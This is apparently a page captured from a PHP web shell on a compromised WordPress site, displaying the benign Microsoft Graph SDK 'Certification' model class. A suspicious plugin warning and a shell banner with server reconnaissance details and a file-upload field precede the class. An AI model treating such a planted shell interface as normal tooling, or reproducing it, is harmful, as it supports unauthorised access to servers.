Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/hopeinstoughton_www/vendor/microsoft/microsoft-graph/src/Model/ |
Upload File : |
<?php
/**
* Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information.
*
* Certification File
* PHP version 7
*
* @category Library
* @package Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license https://opensource.org/licenses/MIT MIT License
* @link https://graph.microsoft.com
*/
namespace Microsoft\Graph\Model;
/**
* Certification class
*
* @category Model
* @package Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license https://opensource.org/licenses/MIT MIT License
* @link https://graph.microsoft.com
*/
class Certification extends Entity
{
/**
* Gets the certificationDetailsUrl
* URL that shows certification details for the application.
*
* @return string|null The certificationDetailsUrl
*/
public function getCertificationDetailsUrl()
{
if (array_key_exists("certificationDetailsUrl", $this->_propDict)) {
return $this->_propDict["certificationDetailsUrl"];
} else {
return null;
}
}
/**
* Sets the certificationDetailsUrl
* URL that shows certification details for the application.
*
* @param string $val The value of the certificationDetailsUrl
*
* @return Certification
*/
public function setCertificationDetailsUrl($val)
{
$this->_propDict["certificationDetailsUrl"] = $val;
return $this;
}
/**
* Gets the certificationExpirationDateTime
* The timestamp when the current certification for the application will expire.
*
* @return \DateTime|null The certificationExpirationDateTime
*/
public function getCertificationExpirationDateTime()
{
if (array_key_exists("certificationExpirationDateTime", $this->_propDict)) {
if (is_a($this->_propDict["certificationExpirationDateTime"], "\DateTime") || is_null($this->_propDict["certificationExpirationDateTime"])) {
return $this->_propDict["certificationExpirationDateTime"];
} else {
$this->_propDict["certificationExpirationDateTime"] = new \DateTime($this->_propDict["certificationExpirationDateTime"]);
return $this->_propDict["certificationExpirationDateTime"];
}
}
return null;
}
/**
* Sets the certificationExpirationDateTime
* The timestamp when the current certification for the application will expire.
*
* @param \DateTime $val The value to assign to the certificationExpirationDateTime
*
* @return Certification The Certification
*/
public function setCertificationExpirationDateTime($val)
{
$this->_propDict["certificationExpirationDateTime"] = $val;
return $this;
}
/**
* Gets the isCertifiedByMicrosoft
* Indicates whether the application is certified by Microsoft.
*
* @return bool|null The isCertifiedByMicrosoft
*/
public function getIsCertifiedByMicrosoft()
{
if (array_key_exists("isCertifiedByMicrosoft", $this->_propDict)) {
return $this->_propDict["isCertifiedByMicrosoft"];
} else {
return null;
}
}
/**
* Sets the isCertifiedByMicrosoft
* Indicates whether the application is certified by Microsoft.
*
* @param bool $val The value of the isCertifiedByMicrosoft
*
* @return Certification
*/
public function setIsCertifiedByMicrosoft($val)
{
$this->_propDict["isCertifiedByMicrosoft"] = $val;
return $this;
}
/**
* Gets the isPublisherAttested
* Indicates whether the application has been self-attested by the application developer or the publisher.
*
* @return bool|null The isPublisherAttested
*/
public function getIsPublisherAttested()
{
if (array_key_exists("isPublisherAttested", $this->_propDict)) {
return $this->_propDict["isPublisherAttested"];
} else {
return null;
}
}
/**
* Sets the isPublisherAttested
* Indicates whether the application has been self-attested by the application developer or the publisher.
*
* @param bool $val The value of the isPublisherAttested
*
* @return Certification
*/
public function setIsPublisherAttested($val)
{
$this->_propDict["isPublisherAttested"] = $val;
return $this;
}
/**
* Gets the lastCertificationDateTime
* The timestamp when the certification for the application was most recently added or updated.
*
* @return \DateTime|null The lastCertificationDateTime
*/
public function getLastCertificationDateTime()
{
if (array_key_exists("lastCertificationDateTime", $this->_propDict)) {
if (is_a($this->_propDict["lastCertificationDateTime"], "\DateTime") || is_null($this->_propDict["lastCertificationDateTime"])) {
return $this->_propDict["lastCertificationDateTime"];
} else {
$this->_propDict["lastCertificationDateTime"] = new \DateTime($this->_propDict["lastCertificationDateTime"]);
return $this->_propDict["lastCertificationDateTime"];
}
}
return null;
}
/**
* Sets the lastCertificationDateTime
* The timestamp when the certification for the application was most recently added or updated.
*
* @param \DateTime $val The value to assign to the lastCertificationDateTime
*
* @return Certification The Certification
*/
public function setLastCertificationDateTime($val)
{
$this->_propDict["lastCertificationDateTime"] = $val;
return $this;
}
}